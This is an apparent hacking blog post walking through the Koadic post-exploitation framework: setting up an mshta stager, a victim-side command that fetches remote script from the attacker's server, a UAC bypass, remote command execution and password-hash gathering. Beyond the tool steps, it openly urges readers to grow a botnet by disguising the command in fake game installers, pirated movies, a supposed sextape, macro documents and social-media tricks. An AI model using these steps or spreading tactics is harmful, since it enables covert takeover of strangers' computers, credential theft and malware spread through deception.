CyberMoransđ¤
The Koadic post-exploitation toolkitđ serves as an alternative to tools like Meterpreter and PowerShell Empire𤨠While there is some difference in how payloads & exploits are delivered, Koadic provides a fully-featured environment to remotely perform tasks on an exploited Windows systemđ¤Ť
Koadic provides two categories of functions; stagers and implants đ
These allows hackersđ to monitor and control exploited Windows systems remotely. The tool facilitates remote access to Windows devices via the Windows Script Host, working with practically every version of Windows. It is able to do this entirely in memory to evade detection and is also able to encrypt its own web c2 communicationsđ
Stagers -- are used to create the actual remote-access connections through different Windows-based processes, and implants -- are used to complete tasks on systems which are already connected as zombie machines over the stager connectionâ ď¸
These đ implants can execute commands, retrieve system keys and password hashes, play video and even take pictures with the webcam on the zombie device.đ
So, Morans, lets do thisđŞ
đ Set up Koadic đ¤
Koadic can be run by entering on the terminalđ
koadic 
The most useful command to for an overview of how to use Koadic is 'help'đ
The 'help' command provides an overview of the different commandsđ available. Koadic functions similarly to other frameworks such as MetasploitđĽł. It allows for individual modules to be loaded and configured. Once a module is selected, parameters set, then the module can be runđą. Koadic also provides autocomplete triggered by pressing Tab. Just like metasploit and meterpreterđ
First, load the mshta stager by runningđ
use stager/js/mshta
The stager allows us to define where the Koadic command & controlđ˝ is accessed by any "zombie" devices. You can view these settings by running 'info' once the stager is selectedđ
The stager allows us to define the IP, port, and expiry date of the c&c, as well as keys and certificates if desired. The default port of "9999" . Please confirm that the "SRVHOST" IP value corresponds to your IP on your local network, or maybe to a VPS or server which Koadic is running onđ¤. To set it manually, run the command below, where IP is the desired IP address for the staging serverđ
set SRVHOST IP
Once the staging server is configured, it's readyđ¤. Launch the stager by typing 'run' on the Koadic command line and hit Enterđ
đ Hook your first Zombie PC to the C&C đ¤
A Windows PC can be connected to the Koadic "mshta" staging server by running just one line on the cmdđ°. This command, will begin with 'mshta' followed by the IP and port of the staging server. The command can also be found on the Koadic command log itself, as it is shown after running the stagerđ
mshta http://192.168.0.105:9999/LJgy7Once this command is run, the Windows device will be connected as a zombie to the c&c đ
In a real-world attackđ, the command would generally be executed by another program, a USB Rubber Ducky, or an application exploitđ, rather than simply being run by the user within the command prompt. It also allows you to have alot of zombies for a botnet maybe. To grow and propagate this botnet of zombiesđ
đ You can write a bash/shell script that executes the command
đ you can use steganography to embed this command on a multimedia file (jpg, png etc) and share it on a group on whatsapp or telegram
đ you can use document macros like word, oneNote and PDFs
đ You can use a .exe disguised as a game and share it on discord or twitch
đ You can use a .scr file since it works like a .exe but few people know that.
đ You can disguise it as something interesting and drop it on pirate bay...the latest movie or a game crack, or a sextape
đ Social Engineering & Treachery -- Telling people on Twitter and Facebook to open cmd and enter the command supposedly to improve their internet connection or check if they can mine crypto
....etc....get creative and grow that botnet
Run this on the target windows machineđ
After the command is run, we can confirm that the zombie is connected by running 'zombies' command within Koadicđ
The first zombie connected will be assigned the ID of 0 (zero). To view more info on this zombie, run the commandđ
zombies 0
This device is already pwndđ, but not yet elevated (priviledges)đ
Next, we'll look at gaining additional user privileges on the zombie machineđ¤¤
đ Elevate & Escalate priviledges đ¤
To test privilege escalation against the Windows machine, use the "Bypass User Account Control" implantđ. We can load this by running within Koadic đ
use implant/elevate/bypassuac_eventvwrThen, set the payload value in order to have the implant run. You can leave the value of "ZOMBIE" as "ALL" to attack all zombies, or set it to the specific zombie you wish to attack. To adjust the payload value, run the command đ
set PAYLOAD 0After the payload is set, we can launch the UAC bypass attempt by simply executing 'run' from the Koadic command lineđ
When the task is complete, check that the privilege escalation attack was successful đĽ˛by checking the zombie information, To see the status of the first zombie device, run 'zombies 0' command đ
When the "Elevated" status shows "YES!" the Windows device is now hooked and privilege escalation completeđĽłđĽłđĽł
đ Koadic Post-Exploitation Implants đ¤
So now we have an exploited deviceđ with elevated privilegesđ, there are a number of rootkit functionsđ we can perform from the Koadic c&c. The "implant" modules, as shown below, shows a few of the capabilities available in Koadicđ
The "exec_cmd" implant allows you to run any command on the Windows system đĽ˛. To load this implant, run the commandđ
use implant/manage/exec_cmdTo set a command, use the set command, same as when changing settings for other modules. To set the command to be run to dir đ¨, which will return a list of files and directories, run the commandđ
set CMD dirTo confirm these settings were changed, run info to view the module informationđ
If the implant settings are set, simply type run and hit Enter to run the moduleđđ
Other implants, such as the "gathering" tools shown below, attempt to capture important information such as user account detailsđ and password hashes and send them to the command-and-control serverđ
Koadic also provides several "fun" đimplants. The "voice" implant uses Window's integrated text-to-speech tools đ to "speak" a message on the zombie computerđ
To use this implant, first run 'use implant/fun/voice'. The message can be set with 'set MESSAGE 'followed by the desired message to be spokenđ¤. The specific zombies can also be set in the same way as in the previous modules or it can be left to the default value of "ALL" to be run on all zombies. Type 'run' and hit Enterđ
While these attacks have mixed successđĽł, the majority of the rootkit implants are very effective, even on modern versions of Windowsđ¤¨. The limited detection possibility and potential for automation using Python scripts establishes Koadic as a potent remote-access toolkit capable of carrying out complex attacksđ
đConclusion đ¤
Subscribe to receive notifications of similar posts đ where we will be reverse engineering malware, vulnerabilities as well as hacking tools, vectors, stories, tutorials and other Infosec stuff...đ
Follow me on twitter for daily Infosec Memes and shenanigansđ
Morans,
Thank you for taking time and hope you learned something new, Like and leave a comment/review and as always, stay awesome! đđ đŞ
Comments